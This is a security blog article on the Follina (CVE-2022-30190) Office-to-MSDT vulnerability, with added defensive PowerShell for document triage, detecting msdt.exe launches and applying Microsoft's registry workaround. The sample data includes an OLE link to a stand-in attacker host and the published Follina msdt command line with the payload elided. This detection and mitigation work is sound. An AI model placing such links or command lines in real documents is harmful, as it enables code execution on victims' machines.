Penetration Test | Jan Kahmen | 9 min read

Follina: Attacks via Office Files

Known as Follina, CVE-2022-30190 is, at the time of writing, one of the most serious unpatched vulnerabilities that can be triggered through Office files.


The CVE-2022-30190 vulnerability, known as Follina, is currently one of the most serious security vulnerabilities. It allows an attacker to reach the Microsoft Support Diagnostic Tool (MSDT) through a Microsoft Office document and run commands with the privileges of the user who opens or previews it. The fact that this bug had not been fixed at the time of writing makes it particularly worrying: Office is a ubiquitous tool, and therefore extremely interesting to cybercriminals.

What is the Follina vulnerability aka CVE-2022-30190?

The CVE-2022-30190 vulnerability lies in the Microsoft Support Diagnostic Tool (MSDT), a built-in Windows troubleshooting component that other applications can start through the ms-msdt: URL protocol. At first glance this may seem negligible, but it gives cybercriminals an active entry point through Office: a specially crafted document makes Word invoke the protocol handler, and MSDT then executes attacker-supplied commands without the user ever being asked to enable macros. This affects not only classic Word (.docx) documents, but other file types as well, in particular RTF.

How Does the Attack via Office Files Work?

An attack via Microsoft's software can look like this: The attacker prepares a malicious Office document. Instead of a macro, the document contains a linked OLE object whose target is an HTML file on a web server the attacker controls. He then sends this file to potential victims, most commonly as an e-mail attachment. Often, the necessary social engineering is done beforehand to make sure the content of the e-mail is interesting enough for you to open it.
If you do not recognize the message as malicious and open the attachment, Word fetches the linked HTML file. The script in that file navigates to an ms-msdt: URL, which starts MSDT with attacker-chosen troubleshooter parameters; one of those parameters is evaluated by PowerShell inside the troubleshooter, so the command embedded in it is executed. No macro warning is shown at any point.
As a result, the attackers can install programs with the rights of the logged-in user. Alternatively, of course, the cybercriminals can view, modify or destroy data.
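The following PowerShell script is an added example and is not part of the original article or of any Microsoft tooling. It inspects a document for the artefacts described above: in a .docx, a linked OLE object whose target is a remote URL; in an RTF file, an automatically updating linked object whose hex-encoded object data contains a URL. The sample document it builds, the file names and the attacker URL are constructed for the demonstration.

```powershell
# Added example, not code from the original article: triage a .docx or .rtf for
# the artefacts the Follina delivery chain relies on. File names, the sample
# document and the attacker URL are constructed for this demonstration.
Add-Type -AssemblyName System.IO.Compression.FileSystem

function Test-FollinaIndicators {
    param([Parameter(Mandatory)][string]$Path)
    $findings = [System.Collections.Generic.List[string]]::new()
    $ext = [System.IO.Path]::GetExtension($Path).ToLowerInvariant()

    if ($ext -in '.docx', '.docm', '.dotx', '.dotm') {
        # OOXML is a zip container. word/_rels/document.xml.rels records where
        # every embedded or linked object comes from; a Target with
        # TargetMode="External" is fetched over the network when Word loads it.
        $zip = [System.IO.Compression.ZipFile]::OpenRead($Path)
        try {
            $entry = $zip.GetEntry('word/_rels/document.xml.rels')
            if ($entry) {
                $reader = [System.IO.StreamReader]::new($entry.Open())
                try { [xml]$rels = $reader.ReadToEnd() } finally { $reader.Dispose() }
                foreach ($rel in $rels.Relationships.Relationship) {
                    if ($rel.Type -like '*/oleObject' -and $rel.TargetMode -eq 'External' -and
                        $rel.Target -match '^https?://') {
                        $findings.Add("external OLE link to $($rel.Target)")
                    }
                }
            }
        } finally { $zip.Dispose() }
    }
    elseif ($ext -eq '.rtf') {
        $text = [System.IO.File]::ReadAllText($Path)
        # \objautlink plus \objupdate marks a linked object that Word refreshes
        # by itself, which is how the RTF variant fetches its payload on preview.
        if ($text -match '\\objautlink' -and $text -match '\\objupdate') {
            $findings.Add('auto-updating linked OLE object (\objautlink + \objupdate)')
        }
        # The link target sits inside the hex-encoded \objdata stream. Decode it
        # and look for a URL as 8-bit text and as UTF-16LE at either alignment.
        foreach ($m in [regex]::Matches($text, '\\objdata\s*([0-9A-Fa-f\s]+)')) {
            $hex = $m.Groups[1].Value -replace '\s', ''
            $hex = $hex.Substring(0, $hex.Length - ($hex.Length % 2))
            $bytes = [byte[]]::new([int]($hex.Length / 2))
            for ($i = 0; $i -lt $bytes.Length; $i++) {
                $bytes[$i] = [Convert]::ToByte($hex.Substring(2 * $i, 2), 16)
            }
            $views = [System.Collections.Generic.List[string]]::new()
            $views.Add([System.Text.Encoding]::GetEncoding(28591).GetString($bytes))
            for ($off = 0; $off -lt 2 -and $off -lt $bytes.Length; $off++) {
                $views.Add([System.Text.Encoding]::Unicode.GetString($bytes, $off, $bytes.Length - $off))
            }
            foreach ($view in $views) {
                foreach ($u in [regex]::Matches($view, 'https?://[^\s\x00"<>]+')) {
                    $findings.Add("linked object target $($u.Value)")
                }
            }
        }
    }
    [pscustomobject]@{ Path = $Path; Suspicious = ($findings.Count -gt 0); Findings = $findings.ToArray() }
}

# Constructed sample: a minimal .docx whose relationships part links an OLE
# object to a remote HTML page, the shape of the documents seen in the wild
# (published samples end the URL with "!").
$relsXml = @'
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
<Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://attacker.example/payload.html!" TargetMode="External"/>
</Relationships>
'@
$sample = Join-Path ([System.IO.Path]::GetTempPath()) 'follina-sample.docx'
if (Test-Path $sample) { Remove-Item $sample -Force }
$archive = [System.IO.Compression.ZipFile]::Open($sample, 'Create')
$writer = [System.IO.StreamWriter]::new($archive.CreateEntry('word/_rels/document.xml.rels').Open())
$writer.Write($relsXml); $writer.Dispose(); $archive.Dispose()

Test-FollinaIndicators -Path $sample | Format-List
```

Run it against attachments quarantined by the mail gateway or against files found on a share. A hit is an indicator, not proof: legitimate documents can link to external objects, so the target URL is what you investigate next.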

Attacks via CVE-2022-30190 are Widespread

Office products have been part of everyday (work) life since long before the cloud transformation; for many people they are indispensable. That makes this zero-day vulnerability all the more risky, because it offers enormous potential for cybercriminals. Some of them just want to cause mischief; other attackers steal your credentials and information to sell them afterwards.
The fatal thing about Follina is that it is relatively easy to exploit: no macros and no memory-corruption bug, just a document that points to a web page. That is why it is excellent for spreading malware and spying on data.
For Word (.docx) files, Protected View blocks the attack as long as you do not click "Enable Editing". For the RTF variant, however, you do not even have to open the file: selecting it with the Windows Explorer preview pane enabled is enough to trigger the malicious code, because the preview does not apply Protected View. This makes it all the more important that you recognize such e-mails as malicious and take security measures immediately. A regular penetration test for SMBs will also help you keep an eye on the state of your IT security.

These Microsoft Products are Affected by Follina

The fact that companies benefit from a well-thought-out security concept has not just been known since Follina. Only recently, the Log4j zero-day vulnerability (Log4Shell) and PrintNightmare caused a stir. Now CVE-2022-30190 proves once more that reliable incident response management is essential in the enterprise: after all, the number of Microsoft Office users is large.
The hope that the vulnerability would only affect certain versions of Microsoft products was not fulfilled. Since the component under attack is MSDT, which ships with Windows itself, the vulnerability is present on all currently used Windows versions. According to Microsoft's advisory, these include:

  • All Microsoft Windows client versions from Windows 7 onwards
  • All server versions from Windows Server 2008 onwards
  • Every Microsoft Office version that can load the document, since Office only provides the path to MSDT

The fact that the affected products cannot be narrowed down to a few versions already shows how critical the vulnerability is. It offers enormous potential for cyberattacks, which becomes even more serious in the context of cloud transformation. Nevertheless, it is initially classic Word and RTF files that the attackers are using.

BSI and Microsoft Increase their Risk Assessment

When the vulnerability was first reported to Microsoft on April 12, 2022, the Microsoft Security Response Center (MSRC) closed the report as "not security relevant". The situation has since changed: MSRC has assigned CVE-2022-30190 and rates it 7.8 out of 10 (CVSS), i.e. "high". This upgrade in severity was accompanied by Microsoft announcing that it is working on a security update.
The BSI (German Federal Office for Information Security) also recognized the danger and declared IT threat level 3 ("orange") on May 31, 2022. This is the second-highest of its four levels and signifies a business-critical IT threat situation with massive disruption of regular operations.
What has Microsoft done so far?
Microsoft has since acknowledged the danger posed by the vulnerability, but at the time of writing no date has been set for a security update. Instead, Microsoft and the BSI recommend temporarily disabling the ms-msdt: URL protocol handler, so that Office can no longer hand a document's ms-msdt: link to MSDT.

This is what Makes the Follina Vulnerability so Treacherous

The tricky part of the problem is the direct call to MSDT. Office passes the ms-msdt: URL, including attacker-chosen troubleshooter parameters, to the protocol handler, and one of those parameters is evaluated as a PowerShell expression inside the troubleshooter. Whatever command the attacker has placed there runs in the context of the logged-in user. As mentioned above, with the RTF variant you do not even have to open the file for this to happen.
Documents cause damage even if unopened
One of the biggest dangers of the vulnerability is that even unopened files can cause damage. This concerns not only Word formats, but also RTF documents; both can be prepared with the malicious link by cybercriminals. For RTF files it is not necessary to open the file: simply selecting it in Windows Explorer with the preview pane enabled is enough to invoke the handler.
For users of a network drive, this means that as soon as someone stores such a document on a share, every user who browses that folder with the preview pane enabled triggers the malicious code on their own machine.
Previous solutions from Microsoft are not sufficient
Unfortunately, at the time of writing there is no patch from Microsoft for CVE-2022-30190, only a guidance document (MSRC blog post of May 30, 2022) that shows how to mitigate the vulnerability. The Follina vulnerability, which has been known since April, thus remains an open risk for numerous companies.
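Because the preview-pane case needs no user action at all, mail filtering alone does not catch it; endpoint telemetry that sees msdt.exe being started does. The following PowerShell is an added example and not code from the original article. It flags process-creation events in which msdt.exe is launched through the ms-msdt: URL with a PowerShell subexpression in the IT_BrowseForFile parameter, which is the pattern of the published Follina command line. The live hunt assumes Sysmon is installed; the sample events at the end are constructed.

```powershell
# Added example, not code from the original article: flag msdt.exe process
# creations that match the Follina invocation pattern. Test-MsdtAbuse works on
# the fields of a Sysmon event ID 1 (Image, CommandLine, ParentImage);
# Find-MsdtAbuse feeds it live events from a host with Sysmon installed.
# The sample events at the bottom are constructed for this demonstration.
function Test-MsdtAbuse {
    param(
        [Parameter(Mandatory)][string]$Image,
        [Parameter(Mandatory)][string]$CommandLine,
        [string]$ParentImage = ''
    )
    if ($Image -notmatch '\\msdt\.exe$') { return $null }
    $reasons = [System.Collections.Generic.List[string]]::new()

    # A PowerShell subexpression in IT_BrowseForFile is the code-execution
    # primitive itself; a troubleshooter started by a user never carries one.
    if ($CommandLine -match 'IT_BrowseForFile=\$\(') {
        $reasons.Add('PowerShell subexpression in IT_BrowseForFile')
    }
    # A command line beginning with the ms-msdt: URL means msdt.exe came through
    # the protocol handler rather than Control Panel; from an Office parent that
    # means a document did it.
    $officeParent = $ParentImage -match '\\(WINWORD|EXCEL|POWERPNT|OUTLOOK|MSACCESS)\.EXE$'
    if ($CommandLine -match 'ms-msdt:/id\s+PCWDiagnostic' -and $officeParent) {
        $reasons.Add("ms-msdt: URL launched from $([System.IO.Path]::GetFileName($ParentImage))")
    }
    if ($reasons.Count -eq 0) { return $null }
    [pscustomobject]@{ Image = $Image; ParentImage = $ParentImage; CommandLine = $CommandLine; Reasons = $reasons.ToArray() }
}

function Find-MsdtAbuse {
    # Live hunt over Sysmon process-creation events (needs Sysmon and rights to
    # read its operational log). The parent is deliberately not used on its own:
    # in the preview-pane case it can differ from WINWORD.EXE.
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } |
        ForEach-Object {
            $data = @{}
            foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
            Test-MsdtAbuse -Image $data.Image -CommandLine $data.CommandLine -ParentImage $data.ParentImage
        } | Where-Object { $null -ne $_ }
}

# Constructed sample events (not real telemetry). The first mirrors the published
# Follina command line with the payload elided; the second is a user starting the
# same troubleshooter from Control Panel, which must not be flagged.
$samples = @(
    @{ Image = 'C:\Windows\System32\msdt.exe'
       ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
       CommandLine = '"C:\Windows\System32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression(...))i/../../../../../../../../Windows/System32/mpsigstub.exe"' },
    @{ Image = 'C:\Windows\System32\msdt.exe'
       ParentImage = 'C:\Windows\explorer.exe'
       CommandLine = '"C:\Windows\System32\msdt.exe" -id PCWDiagnostic' }
)
foreach ($s in $samples) { Test-MsdtAbuse @s | Format-List }
```

On a fleet, the same two checks translate directly into an EDR or SIEM query; the subexpression check alone has practically no false positives, while the ms-msdt: URL from an Office parent is worth an alert even before the payload is known.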

Here's How Companies can Arm Themselves Against Follina

Microsoft's official guidance gives hope that a permanent patch will be available soon. Until then, it is important to keep potential security risks in check with a security concept and regular pentests. One of the most important measures at the moment is to break the link between the msdt.exe utility and ms-msdt: URLs.
Microsoft itself recommends disabling the ms-msdt: URL protocol handler. This requires administrator privileges. The command for this is reg delete HKEY_CLASSES_ROOT\ms-msdt /f (the /f switch suppresses the confirmation prompt, so the command also works from a script).
Before executing it, export the key to a file (reg export) so that you can restore the original state (reg import) once the workaround is no longer necessary, i.e. once the patch has been installed.
Also important: Be even more careful than usual with e-mail attachments, especially Office and RTF documents, and consider switching off the Explorer preview pane on exposed machines until the patch is available. Regardless of this particular vulnerability, regular static code analysis as part of your software testing is an important step towards improving your IT security.
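Putting the workaround together as a script, the following PowerShell is an added example and is not taken from the article or from Microsoft's guidance document. It exports the key, deletes the registration, verifies the result and restores the key later; the backup path is an assumption.

```powershell
# Added example, not code from the original article: apply Microsoft's
# workaround (remove the ms-msdt: protocol registration), verify it, and undo it
# once the patch is installed. Run in an elevated PowerShell session. The backup
# location is an assumption for this demonstration.
$BackupFile = 'C:\ProgramData\follina-workaround\ms-msdt-backup.reg'

function Disable-MsdtProtocol {
    New-Item -ItemType Directory -Path (Split-Path $BackupFile) -Force | Out-Null
    # 1. Export the key first; without the backup the workaround cannot be undone.
    reg.exe export HKEY_CLASSES_ROOT\ms-msdt $BackupFile /y | Out-Null
    if ($LASTEXITCODE -ne 0) { throw 'Export of HKCR\ms-msdt failed; nothing was changed.' }
    # 2. Delete the protocol registration. /f suppresses the confirmation prompt
    #    so the command also works from a script or a remote session.
    reg.exe delete HKEY_CLASSES_ROOT\ms-msdt /f | Out-Null
    if ($LASTEXITCODE -ne 0) { throw 'Could not delete HKCR\ms-msdt (are you running elevated?).' }
}

function Test-MsdtProtocolDisabled {
    # With the key gone, neither Office nor the Explorer preview can hand an
    # ms-msdt: URL to msdt.exe. Troubleshooters started from Settings or the
    # Get Help app keep working because they do not go through the handler.
    -not (Test-Path 'Registry::HKEY_CLASSES_ROOT\ms-msdt')
}

function Restore-MsdtProtocol {
    if (-not (Test-Path $BackupFile)) { throw "No backup at $BackupFile" }
    reg.exe import $BackupFile | Out-Null
    if ($LASTEXITCODE -ne 0) { throw 'Import of the backup failed.' }
}

Disable-MsdtProtocol
if (Test-MsdtProtocolDisabled) { 'ms-msdt: handler removed' } else { 'handler still present, check permissions' }
# Once Microsoft's patch has been installed:  Restore-MsdtProtocol
```

The export step is the part most often skipped when the command is typed by hand; keep the .reg file with your change record, because it is the only clean way back to the original registration.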

Conclusion - Still Waiting for a Permanent Patch

At the time of writing, a permanent patch for the Follina vulnerability is not yet in sight. Since the vulnerability was already seen in the wild in March and April 2022, the lack of a patch is a cause for concern. As soon as one is available, you should install it without delay.
Still, waiting for a patch is not enough: most companies sooner or later suffer an attack that they have to deal with. In such an emergency, it is necessary to be able to fall back on functioning incident response management.
An underlying security concept, regular penetration tests for SMEs and static code analysis help you to mitigate the dangers. After all, vulnerabilities such as Log4Shell, PrintNightmare or Follina will keep appearing.
Being well prepared for such incidents is therefore essential. In particular, training by experts prepares you and your employees and shows you what matters in an emergency.

